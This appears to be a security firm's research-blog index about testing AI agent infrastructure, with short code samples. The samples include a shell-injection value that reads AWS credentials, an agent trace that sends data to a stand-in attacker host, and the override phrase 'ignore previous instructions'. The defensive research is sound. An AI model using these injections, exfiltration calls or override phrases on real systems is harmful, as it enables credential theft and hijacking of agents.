Tachyonic
Blog/research

We Tested 14 AI Agent Infrastructure Targets. Here's What Actually Breaks.

200+ confirmed vulnerabilities across 14 AI agent infrastructure targets. The patterns are consistent: unsanitized tool inputs, missing auth on internal APIs, credentials in plaintext, and sandbox isolation that doesn't isolate. Recent incidents just proved these aren't theoretical.

research · Apr 22, 2026
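
To make the first of those patterns concrete, here's a minimal sketch of an unsanitized tool input, using a hypothetical `ping` tool rather than code from any of the audited targets, next to the safer shape:

```python
import subprocess

# Vulnerable: the model-controlled `hostname` argument is interpolated into a
# shell string, so a value like "example.com; cat ~/.aws/credentials" runs a
# second command. Hypothetical tool, illustrative only.
def ping_tool_unsafe(hostname: str) -> str:
    return subprocess.run(
        f"ping -c 1 {hostname}", shell=True, capture_output=True, text=True
    ).stdout

# Safer: validate the value, then pass it as a discrete argv element so the
# shell never parses it.
def ping_tool(hostname: str) -> str:
    if not hostname.replace(".", "").replace("-", "").isalnum():
        raise ValueError(f"rejecting suspicious hostname: {hostname!r}")
    return subprocess.run(
        ["ping", "-c", "1", hostname], capture_output=True, text=True
    ).stdout
```

The same string-interpolation mistake recurs wherever a tool argument reaches a shell, a SQL query, or a file path.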

OWASP Tells You What's Wrong. We Built the Framework for How to Fix It.

We open-sourced the Evolutionary Security Framework — a ten-phase maturity model for progressively hardening agentic AI systems, from naming threats to mathematically proving defenses.

research · Apr 7, 2026

We Ran 396 Attacks Against a Browser Agent — Your Triage Pipeline Isn't Ready

Browser agents break every auto-triage heuristic built for chatbots and MCP tools. 193 findings. 191 false positives. 2 real vulnerabilities the scanner missed. Here's what we learned.

research · Mar 31, 2026
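
Why do chatbot-era heuristics fail here? A common one (hypothetical, not any particular scanner's rule) marks a finding as real only when the injected payload is echoed in the model's text reply. A browser agent's output is a trace of actions, not a reply, so the check misses real compromises and fires on any page that merely displays the payload:

```python
# Hypothetical chatbot-era triage rule: a finding is "real" only if the
# injected payload is echoed back in the model's text response.
def triage_chat_finding(payload: str, response_text: str) -> bool:
    return payload.lower() in response_text.lower()

# A browser agent "responds" with actions, not text, so the payload never
# appears in its output and a genuine exfiltration triages as benign.
agent_trace = [
    {"action": "navigate", "url": "https://attacker.example/collect?data=..."},
    {"action": "click", "selector": "#confirm"},
]
assert not triage_chat_finding("ignore previous instructions", str(agent_trace))
```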

We Tested Two MCP Implementations Against Three Attack Classes — Here's What Broke

Independent security assessment of two production MCP implementations reveals 11 vulnerabilities and 7 specification gaps. All traced to normative omissions in the MCP specification.

research · Mar 3, 2026

We Audited Both MCP SDKs — Here Are the Three Vulnerability Classes We Found

Source-code audit of both MCP SDKs reveals three boundary-crossing vulnerability classes. All confirmed with live PoC exploits and validated against production LLMs.

research · Feb 24, 2026

We Catalogued 122 Ways to Break AI Systems — Here's the Taxonomy

We built a comprehensive taxonomy of 122 AI-specific attack vectors, mapped to the OWASP LLM Top 10 and MITRE ATLAS. Today we're open-sourcing it.

research · Feb 3, 2026
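
If you want a feel for the shape before reading the post: each vector in a taxonomy like this reduces to a small record carrying its cross-framework mappings. A sketch, where the field names are illustrative rather than the released schema, though the OWASP and ATLAS identifiers are real:

```python
from dataclasses import dataclass, field

@dataclass
class AttackVector:
    """One taxonomy entry with its cross-framework mappings (illustrative schema)."""
    vector_id: str
    name: str
    description: str
    owasp_llm: list[str] = field(default_factory=list)    # OWASP LLM Top 10 IDs
    mitre_atlas: list[str] = field(default_factory=list)  # MITRE ATLAS technique IDs

# LLM01 (Prompt Injection) and AML.T0051 (LLM Prompt Injection) are real
# OWASP / ATLAS identifiers; the entry itself is a made-up example.
example = AttackVector(
    vector_id="TX-017",
    name="Indirect prompt injection via retrieved content",
    description="Attacker-controlled text in a fetched page steers the agent.",
    owasp_llm=["LLM01"],
    mitre_atlas=["AML.T0051"],
)
```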